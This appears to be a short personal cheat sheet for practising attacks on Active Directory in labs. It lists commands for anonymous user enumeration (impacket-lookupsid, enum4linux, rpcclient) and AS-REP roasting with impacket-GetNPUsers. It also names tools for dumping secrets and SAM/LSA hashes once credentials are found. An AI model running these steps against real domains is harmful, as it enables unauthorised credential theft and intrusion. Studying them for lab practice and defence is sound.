Active Directory Security

PRACTICE ! PRACTICE ! PRACTICE !

Enumerating the Usernames first !

If anonymous user has READ permissions over the $IPC share, then

$ impacket-lookupsid anonymous@10.10.117.62 | tee users.txt

Meanwhile, run the enum4linux in the background

$ enum4linux -a 10.10.10.x | tee enum4linux.log

If rpcclient has anonymous login then

rpcclient $> enumdomusers
rpcclient $> enumdomgroups

The last GO-TO option !

AS-REP Roasting

After finding valid usernames, try to check if there is any way to AS-REP roast

$ impacket-GetNPUsers spooky.local/ -no-pass -usersfile users.txt -dc-ip <target ip> 

After Having Creds

• Enumerate Shares with those creds - cme

• Try dumping the secrets with it - impacket-secretsdump

• Try dumping the sam and lass - crackmapexec

• Check for winrm, smb and other services till it gets Pwn3d